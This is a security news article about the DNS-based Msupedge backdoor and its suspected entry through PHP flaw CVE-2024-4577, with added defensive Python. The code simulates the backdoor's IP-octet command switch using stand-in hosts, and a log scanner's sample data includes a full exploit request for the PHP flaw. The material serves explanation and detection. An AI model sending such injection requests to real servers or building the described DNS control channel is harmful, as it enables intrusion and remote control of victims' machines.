New DNS-Based Backdoor Threat Discovered at Taiwanese University

Threat analysts have identified a new backdoor that uses a rarely seen DNS-based communication method, deployed in an attack targeting a Taiwanese university.
The backdoor, dubbed Backdoor.Msupedge and identified by Symantec, communicates with a command-and-control (C2) server by using DNS traffic, a technique known but infrequently employed by cybercriminals.
Msupedge operates as a dynamic link library (DLL) and was found installed in specific file paths on the compromised systems. The DLL executes commands received through DNS queries, a method that both helps it evade detection and gives the attacker stealthy control over infected machines, since the traffic blends in with ordinary name resolution.
Among the most distinctive features of Msupedge is that it changes its behavior based on the IP address returned in answer to its DNS query. Specifically, the third octet of the resolved IP address is used as a switch that selects the command to execute, ranging from creating processes to downloading files or putting the system to sleep for a specified duration.
Symantec explained that this new backdoor supports several commands, including:
- Creating a process, with the command line delivered in a DNS TXT record
- Downloading a file from a URL received over DNS
- Putting the infected machine to sleep for up to 24 hours
- Deleting temporary files
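To make the switch concrete, the following Python is an added, offline simulation of an IP-octet command switch of the kind described above. It is not Msupedge's code and not from Symantec's advisory: the opcode numbers, beacon names, zone data and TXT payload formats are all hypothetical, and nothing is actually executed, downloaded or deleted. It does show the mechanism end to end: a resolver answer is parsed, the third octet picks the command, the fourth octet carries a numeric argument, and string arguments ride in a TXT record.

```python
"""Illustrative DNS command switch (added example, not Msupedge's real code).

The resolver, zone data, opcode numbers and TXT payload format below are
constructed for demonstration; Symantec's advisory documents the real values.
Nothing here executes, downloads or deletes anything: each call returns an
Action record describing what a real implant would do at that point.
"""
import ipaddress
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Hypothetical opcode table. The third octet of the resolved address selects the
# command; the fourth octet is a numeric argument for it.
OP_EXEC, OP_DOWNLOAD, OP_SLEEP, OP_CLEANUP = 1, 2, 3, 4
MAX_SLEEP_HOURS = 24  # the article's stated ceiling; the real multiplier may differ

# Constructed zone data standing in for the attacker-controlled authoritative
# name server (100.64.0.0/10 is used because it is not globally routable).
# Each beacon name has an A record (the switch) and, where the command takes a
# string argument, a TXT record carrying it.
FAKE_ZONE: Dict[Tuple[str, str], str] = {
    ("t1.c2.example.invalid", "A"):   "100.64.1.0",   # opcode 1: run the TXT command line
    ("t1.c2.example.invalid", "TXT"): "cmd.exe /c whoami > out.txt",
    ("t2.c2.example.invalid", "A"):   "100.64.2.0",   # opcode 2: download the URL in TXT
    ("t2.c2.example.invalid", "TXT"): "http://dl.example.invalid/p.bin",
    ("t3.c2.example.invalid", "A"):   "100.64.3.90",  # opcode 3: sleep 90 h, capped to 24
    ("t4.c2.example.invalid", "A"):   "100.64.4.0",   # opcode 4: delete temporary files
    ("t5.c2.example.invalid", "A"):   "100.64.9.1",   # opcode 9: unknown, ignored
}

Resolver = Callable[[str, str], Optional[str]]


def fake_resolve(name: str, rtype: str) -> Optional[str]:
    """Offline stand-in for a DNS lookup; None plays the role of NXDOMAIN."""
    return FAKE_ZONE.get((name, rtype))


@dataclass
class Action:
    opcode: int
    param: int
    detail: str


def decode_switch(ip_text: str) -> Tuple[int, int]:
    """Split a dotted-quad answer into (opcode, argument) = (third, fourth octet)."""
    octets = ipaddress.IPv4Address(ip_text).packed
    return octets[2], octets[3]


def dispatch(name: str, resolve: Resolver = fake_resolve) -> Action:
    """Resolve one beacon name and map the answer to a simulated action."""
    a_record = resolve(name, "A")
    if a_record is None:
        return Action(-1, 0, "no A record: implant would retry later")
    opcode, param = decode_switch(a_record)
    if opcode == OP_EXEC:
        return Action(opcode, param, f"create process: {resolve(name, 'TXT') or ''}")
    if opcode == OP_DOWNLOAD:
        return Action(opcode, param, f"download {resolve(name, 'TXT') or ''}")
    if opcode == OP_SLEEP:
        return Action(opcode, param, f"sleep {min(param, MAX_SLEEP_HOURS)}h")
    if opcode == OP_CLEANUP:
        return Action(opcode, param, "delete temporary files")
    return Action(opcode, param, "unknown opcode: ignored")


def run_beacons(names: List[str], resolve: Resolver = fake_resolve) -> List[str]:
    """Walk a sequence of beacon names the way a polling implant would."""
    return [dispatch(n, resolve).detail for n in names]


if __name__ == "__main__":
    for line in run_beacons([f"t{i}.c2.example.invalid" for i in range(1, 6)]):
        print(line)
```

The defender's caveat follows directly from the simulation: the implant never connects to the addresses it resolves, it only reads the answer bytes, so blocking or reputation-scoring those IPs achieves nothing. The useful telemetry is the DNS log itself (queried names, record types, and the answers returned for the beacon domain), which is where indicators such as the C2 domain should be hunted.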
The initial intrusion is believed to have occurred through exploitation of a recent PHP vulnerability, CVE-2024-4577, which affects PHP running in CGI mode on Windows (fixed in PHP 8.3.8, 8.2.20 and 8.1.29). The flaw is a CGI argument injection: Windows' Best-Fit character conversion, applied to the arguments php-cgi receives, can turn a specially encoded byte in the query string into a hyphen, letting an attacker smuggle command-line options to php-cgi and achieve remote code execution. That makes it a serious concern for administrators running PHP on Windows-based web servers.
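The documented exploitation path for this flaw relies on two details: the byte 0xAD (a soft hyphen in the affected Windows code pages) being converted to an ASCII hyphen, and the CGI rule (RFC 3875) that a query string containing no literal `=` is split on `+` and handed to the script as argv. The following Python is an added detection example, not code from the article or from Symantec; the access-log lines are constructed, and the check is a triage heuristic for review, not proof of compromise.

```python
"""Heuristic scan of web-server access logs for CVE-2024-4577 style requests.

Added example; the log lines are constructed, not from any real incident.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_to_bytes

# Constructed access-log lines in common log format (sample input, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2024:10:01:02 +0800] "GET /index.php HTTP/1.1" 200 512
203.0.113.9 - - [10/Jun/2024:10:01:07 +0800] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 88
198.51.100.2 - - [10/Jun/2024:10:02:11 +0800] "GET /test.php?%ADs HTTP/1.1" 200 3120
198.51.100.7 - - [10/Jun/2024:10:02:40 +0800] "GET /shop.php?id=5&name=Jos%C3%A9 HTTP/1.1" 200 2048
198.51.100.8 - - [10/Jun/2024:10:03:01 +0800] "GET /doc.php?doc%ADument HTTP/1.1" 404 210
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)


def cgi_argv_injection(query: str) -> Optional[str]:
    """Return the smuggled php-cgi option (e.g. '-d') if QUERY looks like a
    CVE-2024-4577 style argument injection, otherwise None.

    The query string only reaches php-cgi as argv when it contains no literal
    '=' (RFC 3875), and each '+'-separated word becomes one argument. The
    injection therefore needs a word that starts with byte 0xAD followed by an
    option letter; Best-Fit conversion on affected code pages turns 0xAD into '-'.
    Note the attacker keeps '=' percent-encoded (%3d) for exactly this reason.
    """
    if "=" in query:
        return None
    raw = unquote_to_bytes(query)  # '%AD' -> b'\xad'; '+' is left as the separator
    for word in raw.split(b"+"):
        m = re.match(rb"\xad([A-Za-z])", word)
        if m:
            return "-" + m.group(1).decode("ascii")
    return None


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Parse each log line and report requests whose query string carries an injection."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        query = target.partition("?")[2]
        option = cgi_argv_injection(query)
        if option:
            hits.append({"client": m.group("client"), "option": option,
                         "target": target, "status": m.group("status")})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['client']} smuggled {hit['option']} via {hit['target']} (HTTP {hit['status']})")
```

Two of the constructed lines are deliberately benign: a UTF-8 name (`Jos%C3%A9`) in a query that contains `=` never reaches argv, and a 0xAD byte in the middle of a word (`doc%ADument`) is not at an argument boundary, so neither is flagged. An HTTP 200 on a flagged request, as in the `-d auto_prepend_file=php://input` line, is the case to escalate, since that is the code-execution path.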
“Symantec has seen multiple threat actors scanning for vulnerable systems in recent weeks. To date, we have found no evidence allowing us to attribute this threat and the motive behind the attack remains unknown,” the company wrote.
To help defenders protect against this threat, Symantec has published a list of indicators of compromise (IOCs) in its advisory on Msupedge.